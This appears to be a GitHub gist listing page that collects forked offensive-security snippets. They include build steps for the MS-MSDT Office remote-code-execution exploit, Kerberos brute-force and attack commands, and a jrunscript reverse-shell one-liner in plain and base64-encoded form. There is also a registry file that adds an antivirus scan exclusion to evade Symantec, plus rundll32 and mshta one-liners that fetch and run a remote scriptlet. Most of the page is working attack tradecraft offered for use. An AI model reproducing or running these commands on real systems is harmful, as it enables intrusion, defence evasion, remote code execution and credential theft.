Skip to content

Instantly share code, notes, and snippets.

View Hello-xBugs's full-sized avatar

Hello-xBugs

37 followers · 132 following
View GitHub Profile
@Hello-xBugs
Hello-xBugs / ms-msdt.MD
Created May 30, 2022 15:44 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@Hello-xBugs
Hello-xBugs / AccCheckConsole.txt
Created January 3, 2022 13:40 — forked from bohops/AccCheckConsole.txt
AccChecker LOLBIN [AccCheckConsole.exe]
*Purpose
- UI Accessibility Checker
- Verifies UI accessibility requirements
*LOLBIN Functionality/Steps
1) Go to "Custom Verification Routines" link in reference section and copy the sample verification C# code into Visual Studio.
2) Add proper assembly references (e.g. AccCheck.dll)
3) Insert your C# code under a target method such as Execute()
4) Compile to a .NET managed library (DLL)
5) Invoke the code
@Hello-xBugs
Hello-xBugs / clr_via_native.c
Created August 6, 2020 14:52 — forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@Hello-xBugs
Hello-xBugs / kerberos_attacks_cheatsheet.md
Created January 16, 2020 02:11 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@Hello-xBugs
Hello-xBugs / rundll_exports.csv
Created October 20, 2019 12:29 — forked from mattifestation/rundll_exports.csv
All System32 DLL export functions that contain "RunDLL", an indicator that it's designed to run with rundll32.exe
Module Function
C:\Windows\System32\advpack.dll DelNodeRunDLL32W
C:\Windows\System32\advpack.dll DelNodeRunDLL32A
C:\Windows\System32\advpack.dll DelNodeRunDLL32
C:\Windows\System32\ConnectedAccountState.dll ActionCenterRunDllW
C:\Windows\System32\cryptcatsvc.dll CatDbOfflineRebuildDatabasesRundll32W
C:\Windows\System32\cscui.dll CSCOptions_RunDLLW
C:\Windows\System32\cscui.dll CSCOptions_RunDLLA
C:\Windows\System32\cscui.dll CSCOptions_RunDLL
C:\Windows\System32\devmgr.dll DeviceProblenWizard_RunDLLW
@Hello-xBugs
Hello-xBugs / JVM_POST_EXPLOIT.md
Created August 1, 2019 13:37 — forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@Hello-xBugs
Hello-xBugs / sep-directory-exclusion.reg
Created July 17, 2019 14:12 — forked from mgeeky/sep-directory-exclusion.reg
Symantec Endpoint Protection directory exclusion registry key. According to M-Trends 2018, one of techniques used to overcome active AV scanning is to create a directory for files drop and to add it into AV's exclusion via registry.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Exclusions\ScanningEngines\Directory\Client\1733004144]
"Owner"=dword:00000004
"ProtectionTechnology"=dword:00000001
"FirstAction"=dword:00000011
"SecondAction"=dword:00000011
"DirectoryName"="C:\\to\\be\\excluded\\"
"ThreatName"="C:\\to\\be\\excluded\\"
"ExcludeSubDirs"=dword:00000001
@Hello-xBugs
Hello-xBugs / Invoke-AccessXSLT.ps1
Created July 8, 2019 13:51 — forked from Philts/Invoke-AccessXSLT.ps1
<#
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-AccessXSLT {
<#
@Hello-xBugs
Hello-xBugs / instructions.txt
Created October 8, 2018 09:27 — forked from NickTyrer/instructions.txt
xwizard_sct
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();